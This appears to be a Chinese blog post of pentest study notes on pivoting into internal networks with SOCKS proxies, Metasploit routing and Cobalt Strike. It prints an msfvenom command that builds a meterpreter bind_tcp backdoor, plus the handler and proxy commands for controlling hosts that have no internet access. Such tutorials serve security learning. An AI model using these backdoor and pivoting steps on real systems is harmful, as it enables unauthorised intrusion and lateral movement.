内网安全-代理技术

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量83 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tj2718647721/article/details/132342504
版权

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

-连接方向:正向&反向

代理协议: SOCKS4/5

代理软件: SocksCap Proxifier ProxyChains(linux) 等

reverse是反射  代表反向

bind是本地 代表正向

正向:

使用绑定模式生成后门

将脚本上传对方主机,运行

cs会话主动连接对方网络

ne'wai'na'g

不属于同一个网端,网卡不在一起通讯不了

MSF 通讯

1、添加路由 限于 MSF   (只添加到了msf控制端)

查看路由信息

run autoroute -p

run post/multi/manage/autoroute

添加指定路由,1 是接收的 session 编号

route add 192.168.11.0 255.255.255.0 1

2、Sock 代理 全局同用

use auxiliary/server/socks_proxy

set srvhost 0.0.0.0

set srvport 1115

run

启用代理软件配置 Sock5 代理

CS 通讯

命令:socks 59578

操作:代理转发-Socks 代理

MSF 控制上线-正向连接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 192.168.11.129

set lport 3333

run

CS 控制上线-正向连接

监听器:bind_tcp port

命令:connect ip port

cs建立代理节点

建立一个端口

代理配置端口

设置代理规则,就可以通讯了

使用绑定模式生成后门

将脚本上传对方主机,运行

cs会话主动连接对方网络

msf通讯:

添加路由

加载代理

后续生成后门 运行

tj2718647721
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
第71天:内网安全-域横向网络&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
第124天:内网安全-代理技术&Socks协议&路由不出网&后渗透通讯&CS-MSF上线
qq_46081990的博客
07-06 1599
采用反向连接,配置reverse_tcp后门(绑定Win 7的3333端口)在Win 10运行,于是数据会交给Win 7的3333端口,再让Win 7的3333端口转发至其外网出口的4444端口,最后让控制器连接Win 7的4444端口即可。采用正向连接,配置bind_tcp后门(绑定本地2222端口)在Win 10运行,控制器使用MSF或CS连接Win 10的2222端口即可。方法为:正向连接(适用于防火墙入站较松情况)、反向连接(适用于防火墙入站严格,方法稍复杂但也可以)4、如何进行后门控制?
内网安全-域横向内网漫游Socks代理隧道技术
xhscxj的博客
03-20 2446
因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你
第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
qq_46081990的博客
08-02 1968
拓扑图:在前一次的基础上,win2008做了入站限制(只让访问Web服务),win2012也做了入站限制(只让访问打印机)思路:win7还是有外网出口的,正向tcp/反向tcp都能直接拿下;拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11网卡上设置监听器,转发上线win10);
内网安全--隧道技术&代理技术
金灰的博客
06-06 1537
注:本文仅做技术分享,请勿非法破坏...隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 硬刚网络协议的封杀!代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作) 本地代理外网流量.
第70天-内网安全-域横向内网漫游 Socks 代理隧道技
MCTSOG的博客
05-20 1395
思维导图 基础知识点 1.内外网简单知识 内网ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是外网ip。 2.内网1和内网2通信问题 两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的,必须要借助代理。 3.正反向协议通信连接问题 正向:攻击者去连接受害者 攻击者处于内网,受害者处于外网 反向:受害者去连接攻击者 攻击者处于外网,受害者处于内网 为什么要区分正向和反向? 因为如果控制端是外网主机(103.12.4
网络安全---NS-CH12-防火墙.pptx
06-09
防火墙可以分为: 包过滤防火墙(Packet Filtering) 静态包过滤防火墙 动态包过滤防火墙(状态检测防火墙) 代理技术 应用层代理(应用网关,代理服务器) 电路级网关 混和型防火墙 9 防火墙的分类 网络安全---NS-CH...
frp-0.39.1-linux-arm64.tar,frp内网穿透应用
09-30
FRP的原理是利用反向代理技术将公网请求转发至内网服务器上,并将内网服务器的响应再次转发至公网请求者。在实现内网穿透时,FRP能够将公网与内网之间的隔离突破,使得公网用户可以直接访问内网服务器上的资源,从而...
BugScan圈子沙龙之议题点睛(2015) - 安全技术资料汇总(共5份).zip
02-06
bugscan发展历程以及框架改进.pdf 基于正则类sql注入防御的绕过技巧.pdf 如何优雅的穿透linux内网.pdf 花式玩转bugscan插件.pdf 过滤型插件与反向代理的火花.pdf
1. NAS和SAN存储
u010198709的博客
06-13 439
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 302
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 875
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
软考初级网络管理员__网络单选题
2301_80961833的博客
06-12 926
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
初识形式化验证工具——CPN tools
qq_47966193的博客
06-13 966
CPN Tools工具学习
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 428
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程
爱酷码的博客
06-10 256
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程。测试环境:Nginx+PHP7.0+MySQL5.6。
PHP枫叶小说CMS源码 仿起点中文网源码
爱酷码的博客
06-13 229
PHP枫叶小说CMS源码,仿起点中文网,主要功能:1、网站设置: 关键词 网站描述 底部设置 分卷设置 增加分卷2、分卷列表:带编辑 带删除3、文章发表: 文章发表 文章列表 带编辑 带删除4、导航设置: 导航列表 带编辑 带删除 导航增加 友情链接 带编辑 带删除 带链接增加5、书籍设置: 书籍名称 作者 书籍封面 网站背景图片 书籍简介。
frp内网穿透是什么技术
01-14
frp(Fast Reverse Proxy)是一种用于实现内网穿透的技术内网穿透是指通过公网访问处于内网环境中的设备或服务。通常情况下,内网中的设备无法直接被公网访问,因为它们位于一个由路由器或防火墙保护的私有网络中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值